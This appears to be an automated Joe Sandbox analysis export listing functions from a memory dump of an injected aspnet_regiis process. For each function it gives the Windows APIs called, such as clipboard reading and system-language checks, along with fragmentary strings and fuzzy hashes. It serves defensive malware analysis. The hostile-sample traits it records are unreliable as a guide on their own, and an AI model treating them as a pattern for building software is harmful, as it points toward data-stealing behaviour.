Function 02F842DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemMetrics.USER32 ref: 02F84327
GetSystemMetrics.USER32 ref: 02F84336

Strings

, xrefs: 02F8440A

Memory Dump Source

Source File: 00000003.00000002.2224194191.0000000002F51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true

Associated: 00000003.00000002.2224164070.0000000002F50000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224238398.0000000002F93000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224263035.0000000002F96000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224288807.0000000002FA8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f50000_aspnet_regiis.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: 8473571b5907ddc50d6d8870c1f1f3380f15a7977ce9ecf68b8193b3f751a158
Instruction ID: 20400b80793dfaede4a0aa8dc6b6c7faa737b144dc8fe9f472e761da8ca2064d
Opcode Fuzzy Hash: 8473571b5907ddc50d6d8870c1f1f3380f15a7977ce9ecf68b8193b3f751a158
Instruction Fuzzy Hash: 435173B4D142088FDB40EFACD985A9EBBF0BB48310F11852EE459E7354D734A955CF92

Function 02F74B09 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 410
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LO, xrefs: 02F74EE8

Memory Dump Source

Source File: 00000003.00000002.2224194191.0000000002F51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true

Associated: 00000003.00000002.2224164070.0000000002F50000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224238398.0000000002F93000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224263035.0000000002F96000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224288807.0000000002FA8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f50000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: LO
API String ID: 0-4218834679
Opcode ID: dccf53b8b54f1a1efa1185178a04be9f583919dd1efe389931a40f8c4a40d5ac
Instruction ID: 97543eb424daf761baac644f94679f5db64fb1e3e2342b71fb94f791a2358f80
Opcode Fuzzy Hash: dccf53b8b54f1a1efa1185178a04be9f583919dd1efe389931a40f8c4a40d5ac
Instruction Fuzzy Hash: 8BE1DEB59083408FD310DF65E89066FBBF5EF85394F04892DFA858B380E7788905CB86

Function 02F8E5B0 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(02F6180D), ref: 02F8E5DE

Memory Dump Source

Source File: 00000003.00000002.2224194191.0000000002F51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true

Associated: 00000003.00000002.2224164070.0000000002F50000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224238398.0000000002F93000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224263035.0000000002F96000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224288807.0000000002FA8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f50000_aspnet_regiis.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 02F8717B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetUserDefaultUILanguage.KERNELBASE ref: 02F871B0

Strings

YM23, xrefs: 02F871E4

Memory Dump Source

Source File: 00000003.00000002.2224194191.0000000002F51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true

Associated: 00000003.00000002.2224164070.0000000002F50000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224238398.0000000002F93000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224263035.0000000002F96000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224288807.0000000002FA8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f50000_aspnet_regiis.jbxd

Similarity

API ID: DefaultLanguageUser
String ID: YM23
API String ID: 95929093-3181622464
Opcode ID: 25e9467752e025a1d1a0d76535e0a6ba06db0f97aa872ab765dfba3e54d0678e
Instruction ID: c0dd50f4ac5440c10a66bce20133d579db11a8088aa5236dd74b13918bdcfc55
Opcode Fuzzy Hash: 25e9467752e025a1d1a0d76535e0a6ba06db0f97aa872ab765dfba3e54d0678e
Instruction Fuzzy Hash: 27212438A046988FEB18DA38C8953E8BBA1AB4A350F1481EDC68987784CA344B84CF41

Function 02F8E4D0 Relevance: 1.6, APIs: 1, Instructions: 78memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(00000000,00000000,?,?), ref: 02F8E57B

Memory Dump Source

Source File: 00000003.00000002.2224194191.0000000002F51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true

Associated: 00000003.00000002.2224164070.0000000002F50000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224238398.0000000002F93000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224263035.0000000002F96000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224288807.0000000002FA8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f50000_aspnet_regiis.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: f93cc63222c0c2daa4f2b587a792196a1347a9b7e88adc62570dc326ea9db4e4
Instruction ID: 20195e06ae847df059823e8ce96ffd1d8c62df5421300cb51e522fe9789450b6
Opcode Fuzzy Hash: f93cc63222c0c2daa4f2b587a792196a1347a9b7e88adc62570dc326ea9db4e4
Instruction Fuzzy Hash: 0C1174B7F483114BD314AE79EC84717FA97ABD5240F0E8938EE8893345E6769C0582D1

Function 02F8E6FD Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 02F8E7D5

Memory Dump Source

Source File: 00000003.00000002.2224194191.0000000002F51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true

Associated: 00000003.00000002.2224164070.0000000002F50000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224238398.0000000002F93000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224263035.0000000002F96000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224288807.0000000002FA8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f50000_aspnet_regiis.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: 030cb1982bfe823efeb1c356fc1ccce7a63a1e5d8a0cd560d0d722c1d16122e9
Instruction ID: d860cfa06e37242b37ff9f874f8e863afc972a40aaaf2a425eb83f6d6cbc6189
Opcode Fuzzy Hash: 030cb1982bfe823efeb1c356fc1ccce7a63a1e5d8a0cd560d0d722c1d16122e9
Instruction Fuzzy Hash: 4111F9367542009BD3089F68E8A259FB7E5D766298F040C3DE6F2CB342D2A5C94A9B52

Function 02F8B990 Relevance: 1.5, APIs: 1, Instructions: 34memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000,?), ref: 02F8B9F4

Memory Dump Source

Source File: 00000003.00000002.2224194191.0000000002F51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true

Associated: 00000003.00000002.2224164070.0000000002F50000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224238398.0000000002F93000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224263035.0000000002F96000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224288807.0000000002FA8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f50000_aspnet_regiis.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: e883e75c4dbbe0bf7bda9ed34072aeaba68d15138e09a9a13ff2fcd923ff7c6a
Instruction ID: 5694d26b03619ada9da652be0abd6794f553d5743310efe81dcaf83041687ac7
Opcode Fuzzy Hash: e883e75c4dbbe0bf7bda9ed34072aeaba68d15138e09a9a13ff2fcd923ff7c6a
Instruction Fuzzy Hash: 5FF02B7069C3448BD7085B28E87572ABBE5DF93209F04497DE0C1877D2D73A445ACB22

Function 02F7FEC1 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 02F7FF0A

Memory Dump Source

Source File: 00000003.00000002.2224194191.0000000002F51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true

Associated: 00000003.00000002.2224164070.0000000002F50000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224238398.0000000002F93000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224263035.0000000002F96000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224288807.0000000002FA8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f50000_aspnet_regiis.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 47cfb73f3ba32cb41d4410b01e24ac4b10ff9a8463e20c4418e1b81798b99435
Instruction ID: f180b6959d6e09f3b8e0ca2e62ea389683209a08f7bd52ab890f1ddbf0ce501f
Opcode Fuzzy Hash: 47cfb73f3ba32cb41d4410b01e24ac4b10ff9a8463e20c4418e1b81798b99435
Instruction Fuzzy Hash: E0F06D745047018FD314DF28D1A8756BBE0FF85358F11490CE59A8B391D7759559CF81

Function 02F81B64 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 02F81BA8

Memory Dump Source

Source File: 00000003.00000002.2224194191.0000000002F51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true

Associated: 00000003.00000002.2224164070.0000000002F50000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224238398.0000000002F93000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224263035.0000000002F96000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224288807.0000000002FA8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f50000_aspnet_regiis.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 052513d77a3d7a29db2036165c082c75a1a38d998b12466d5b349a4d8005e95a
Instruction ID: eb1963651cd99030a7b99864fd703d9a816300c8761e1c3bd1b07bfacf41b721
Opcode Fuzzy Hash: 052513d77a3d7a29db2036165c082c75a1a38d998b12466d5b349a4d8005e95a
Instruction Fuzzy Hash: 33F0747460D3418FE754DF69C1A871BBBE1AB88348F11891DE4998B380CBB99958CF82

Function 02F5CCF0 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

CoInitializeEx.COMBASE(00000000,00000002), ref: 02F5CD03

Memory Dump Source

Source File: 00000003.00000002.2224194191.0000000002F51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true

Associated: 00000003.00000002.2224164070.0000000002F50000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224238398.0000000002F93000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224263035.0000000002F96000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224288807.0000000002FA8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f50000_aspnet_regiis.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 7cf1882caca39e9d48822d32d4009cf747560e3c67bbebdc14f9ec8dd44f204d
Instruction ID: 1be0dc7c2d934c7f48ce8ac0970b71c681544e5f664a4005b62c85b45cb62573
Opcode Fuzzy Hash: 7cf1882caca39e9d48822d32d4009cf747560e3c67bbebdc14f9ec8dd44f204d
Instruction Fuzzy Hash: 89D0A770AE434CABD694775CEC17F16B72D9702BA5F040A2AB3B3C61C1DA106A24C576

Function 02F5CD23 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 02F5CD35

Memory Dump Source

Source File: 00000003.00000002.2224194191.0000000002F51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true

Associated: 00000003.00000002.2224164070.0000000002F50000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224238398.0000000002F93000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224263035.0000000002F96000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224288807.0000000002FA8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f50000_aspnet_regiis.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: e15e630bb6253087d62375f4f8a3e4c77220ea0a7f3bab1846f68112ed40b60c
Instruction ID: e0f9fab18d063ec4974860db591b83226be42814b347c44654e34327efd4774e
Opcode Fuzzy Hash: e15e630bb6253087d62375f4f8a3e4c77220ea0a7f3bab1846f68112ed40b60c
Instruction Fuzzy Hash: 6DD0C9347E83457AF5255B1CAC13F54B2515705F95F300A04B327FE2D0CAE07121860C

Function 02F8B979 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000), ref: 02F8B983

Memory Dump Source

Source File: 00000003.00000002.2224194191.0000000002F51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true

Associated: 00000003.00000002.2224164070.0000000002F50000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224238398.0000000002F93000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224263035.0000000002F96000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224288807.0000000002FA8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f50000_aspnet_regiis.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 09f833b0682f561cca66a84721b13a30f5b3865714e45f7d23c664b68b07e5b3
Instruction ID: db5ded3d2cbacde51abffc1623a7609f57a7e5784aea37b4a26018b81a3c5e40
Opcode Fuzzy Hash: 09f833b0682f561cca66a84721b13a30f5b3865714e45f7d23c664b68b07e5b3
Instruction Fuzzy Hash: A6B00231585115F9E1711B215DD5F7F6D6CDF47ED5F104454B214144C046585411D57D

Function 02F8B97F Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000), ref: 02F8B983

Memory Dump Source

Source File: 00000003.00000002.2224194191.0000000002F51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true

Associated: 00000003.00000002.2224164070.0000000002F50000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224238398.0000000002F93000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224263035.0000000002F96000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224288807.0000000002FA8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f50000_aspnet_regiis.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 5b6e11fbec5c32f0f809a96cee6f8086b93d8e872d969640aa46b1a84e7fd525
Instruction ID: cdca6127ce3e95c672de702ca6516f6f27128ec17e4921d3df8cdb29a6b0c7d4
Opcode Fuzzy Hash: 5b6e11fbec5c32f0f809a96cee6f8086b93d8e872d969640aa46b1a84e7fd525
Instruction Fuzzy Hash: 30A00231985115EAD1611F215D95F6B79689B46A95F104854A2141448046685011D569

Non-executed Functions

Function 02F83340 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 103clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 02F83350
GetWindowLongW.USER32 ref: 02F83375
GetClipboardData.USER32 ref: 02F83385
GlobalLock.KERNEL32 ref: 02F8339E
GlobalUnlock.KERNEL32 ref: 02F83492
CloseClipboard.USER32 ref: 02F8349D

Strings

e, xrefs: 02F83428
S, xrefs: 02F833E7

Memory Dump Source

Source File: 00000003.00000002.2224194191.0000000002F51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true

Associated: 00000003.00000002.2224164070.0000000002F50000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224238398.0000000002F93000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224263035.0000000002F96000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224288807.0000000002FA8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f50000_aspnet_regiis.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
String ID: S$e
API String ID: 2832541153-1569406346
Opcode ID: 33503c19eb0f67dbfcbd95eae78b4fcab90f212c843a60ddf1bb94a35429f713
Instruction ID: 0511b537eee19a6fb3ab1650720b3067b467245385c348b9b7f903f5e0b6ce5e
Opcode Fuzzy Hash: 33503c19eb0f67dbfcbd95eae78b4fcab90f212c843a60ddf1bb94a35429f713
Instruction Fuzzy Hash: 72416D7150C3818ED311AF3C958832EFFE19B92264F044EADE9E5872D2D6758549CB93

Function 02F78430 Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 469COMMON

Download Yara Rule

Strings

@K, xrefs: 02F7853F
OZ, xrefs: 02F78531
fU, xrefs: 02F78538

Memory Dump Source

Source File: 00000003.00000002.2224194191.0000000002F51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true

Associated: 00000003.00000002.2224164070.0000000002F50000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224238398.0000000002F93000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224263035.0000000002F96000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224288807.0000000002FA8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f50000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: @K$OZ$fU
API String ID: 0-3622593885
Opcode ID: c85e5ca84c5b3b5dc2b0028471b10fb554d99f4d6bf1ac71b2fe3a09c1bea33a
Instruction ID: 49c5815ea335129c7c9be15689a556aaab53f40f986a72e8d5a22faaa290eae4
Opcode Fuzzy Hash: c85e5ca84c5b3b5dc2b0028471b10fb554d99f4d6bf1ac71b2fe3a09c1bea33a
Instruction Fuzzy Hash: BEF10FB1D00218CBEB24DFA8D8553AEBBB2FF85394F28856DD506AB384D7744942CF91

Function 02F77C20 Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 463COMMON

Download Yara Rule

Strings

@K, xrefs: 02F7853F
OZ, xrefs: 02F78531
fU, xrefs: 02F78538

Memory Dump Source

Source File: 00000003.00000002.2224194191.0000000002F51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true

Associated: 00000003.00000002.2224164070.0000000002F50000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224238398.0000000002F93000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224263035.0000000002F96000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224288807.0000000002FA8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f50000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: @K$OZ$fU
API String ID: 0-3622593885
Opcode ID: 7d39a9b5ef918d62f879c428f0182d760ea880169fb67603a33e50d2fa1f12aa
Instruction ID: c8e8da65ecf2456ced4835c4c9c69eeac5cafb1da39e7dd99fb08c19d47198b8
Opcode Fuzzy Hash: 7d39a9b5ef918d62f879c428f0182d760ea880169fb67603a33e50d2fa1f12aa
Instruction Fuzzy Hash: F0F110B1D002188BEB20DFA8DC553AEBBB2FF45394F28856DD406AB384D7754942CF81

Function 02F826BC Relevance: 35.2, APIs: 1, Strings: 19, Instructions: 173memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 02F82783

Strings

W, xrefs: 02F826D6
_, xrefs: 02F828E9
[, xrefs: 02F82959
K, xrefs: 02F828A9
], xrefs: 02F82929
S, xrefs: 02F826F3
B, xrefs: 02F82919
0, xrefs: 02F82889
R, xrefs: 02F826EB
I, xrefs: 02F826CC
P, xrefs: 02F82939
T, xrefs: 02F82899
U, xrefs: 02F826E3
0, xrefs: 02F82A23
_, xrefs: 02F828F9
Z, xrefs: 02F828D9
C, xrefs: 02F82949
N, xrefs: 02F82969
O, xrefs: 02F828C9

Memory Dump Source

Source File: 00000003.00000002.2224194191.0000000002F51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true

Associated: 00000003.00000002.2224164070.0000000002F50000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224238398.0000000002F93000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224263035.0000000002F96000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224288807.0000000002FA8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f50000_aspnet_regiis.jbxd

Similarity

API ID: AllocString
String ID: 0$0$B$C$I$K$N$O$P$R$S$T$U$W$Z$[$]$_$_
API String ID: 2525500382-1084323612
Opcode ID: a1d62be45159ea9037209021c60f3661970284ed6e7d7b443b41b4d66bff84d2
Instruction ID: 905296b2870782be4e571166e93c7e7aaa1f3e0c22b594a98a0d8ab6e30a98f0
Opcode Fuzzy Hash: a1d62be45159ea9037209021c60f3661970284ed6e7d7b443b41b4d66bff84d2
Instruction Fuzzy Hash: FFA1092150DBC28DD332963C885879BBEC16BA7234F184B9DE0F99B2D6C7744406C763

Function 02F820E2 Relevance: 21.1, APIs: 2, Strings: 10, Instructions: 97COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 02F820EC
VariantInit.OLEAUT32 ref: 02F820FF

Strings

m, xrefs: 02F82162
e, xrefs: 02F8213A
i, xrefs: 02F82176
{, xrefs: 02F8211C
c, xrefs: 02F82144
a, xrefs: 02F8214E
y, xrefs: 02F82126
k, xrefs: 02F8216C
g, xrefs: 02F82130
o, xrefs: 02F82158

Memory Dump Source

Source File: 00000003.00000002.2224194191.0000000002F51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true

Associated: 00000003.00000002.2224164070.0000000002F50000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224238398.0000000002F93000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224263035.0000000002F96000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224288807.0000000002FA8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f50000_aspnet_regiis.jbxd

Similarity

API ID: Variant$ClearInit
String ID: a$c$e$g$i$k$m$o$y${
API String ID: 2610073882-4285228952
Opcode ID: 127daf495a49dc3d1fc9260c926a314dce6b2c8308f32be4a9d97c634e3d4719
Instruction ID: a286df70b803551c6f4bb1f8432c4d8bdef420f06aa6d9539be8641c39cf39aa
Opcode Fuzzy Hash: 127daf495a49dc3d1fc9260c926a314dce6b2c8308f32be4a9d97c634e3d4719
Instruction Fuzzy Hash: 1841693260C7C18ED3259A3CC84975EBFD26BE2314F084A6DE0E5873D6D6B98149C763

Function 02F82B19 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 103COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 02F82B5F

Strings

`, xrefs: 02F82B77
e, xrefs: 02F82B9F
l, xrefs: 02F82BC7
`, xrefs: 02F82B81
r, xrefs: 02F82B95
{, xrefs: 02F82B8B
h, xrefs: 02F82BB3

Memory Dump Source

Source File: 00000003.00000002.2224194191.0000000002F51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true

Associated: 00000003.00000002.2224164070.0000000002F50000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224238398.0000000002F93000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224263035.0000000002F96000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224288807.0000000002FA8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f50000_aspnet_regiis.jbxd

Similarity

API ID: InitVariant
String ID: `$`$e$h$l$r${
API String ID: 1927566239-1369895717
Opcode ID: cf3e60e7ca1a24f7497c9d9949eeca596bea670c3b0dfcc4535fb960bf3e7815
Instruction ID: 9496f679f2fda155a47771fdbe36a361f66ef50f9406cbeab9b15888f94e44ab
Opcode Fuzzy Hash: cf3e60e7ca1a24f7497c9d9949eeca596bea670c3b0dfcc4535fb960bf3e7815
Instruction Fuzzy Hash: 8141477150C7C18AD3668B38889875BBED16BD6328F488B9CE5E50B3D6C3B58506CB63

Function 02F82D8F Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 93COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 02F82DBF

Strings

e, xrefs: 02F82DFF
`, xrefs: 02F82DD7
h, xrefs: 02F82E13
{, xrefs: 02F82DEB
r, xrefs: 02F82DF5
l, xrefs: 02F82E27
`, xrefs: 02F82DE1

Memory Dump Source

Source File: 00000003.00000002.2224194191.0000000002F51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true

Associated: 00000003.00000002.2224164070.0000000002F50000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224238398.0000000002F93000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224263035.0000000002F96000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224288807.0000000002FA8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f50000_aspnet_regiis.jbxd

Similarity

API ID: InitVariant
String ID: `$`$e$h$l$r${
API String ID: 1927566239-1369895717
Opcode ID: 07d87175a681b593ffb84c0fa3a1312f04f08edd05fb91f5e76fe73f558c05ba
Instruction ID: 91186410460bd19d2c8073807bdee144cf1197e7914c4442c5eff716713ed4b2
Opcode Fuzzy Hash: 07d87175a681b593ffb84c0fa3a1312f04f08edd05fb91f5e76fe73f558c05ba
Instruction Fuzzy Hash: 9841593140D7C08ED3268B38885870FBFD16BD6228F498B8CE4E50B2D2C3B58405CB63

Function 02F841B7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 02F841E9
GetSystemMetrics.USER32 ref: 02F841F8

Strings

, xrefs: 02F842A3

Memory Dump Source

Source File: 00000003.00000002.2224194191.0000000002F51000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true

Associated: 00000003.00000002.2224164070.0000000002F50000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224238398.0000000002F93000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224263035.0000000002F96000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2224288807.0000000002FA8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f50000_aspnet_regiis.jbxd

Similarity

